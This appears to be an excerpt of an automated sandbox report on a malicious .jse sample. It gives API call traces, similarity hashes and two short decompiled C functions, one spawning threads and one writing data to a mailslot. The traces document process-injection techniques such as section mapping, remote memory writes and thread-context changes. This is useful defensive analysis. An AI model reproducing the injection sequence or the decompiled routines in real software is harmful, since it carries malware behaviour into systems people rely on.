  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:2E3FB8B38E59480ED8F47449A46E2082
Total matches:37
Initial Analysis Report:Open
Initial sample Analysis ID:66610
Initial sample SHA 256:74D71096AB1B39E13C4299E7A35A9809B0825E1F9ECD13D982A07F64092F4A7A
Initial sample name:BK.485799485.jse

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
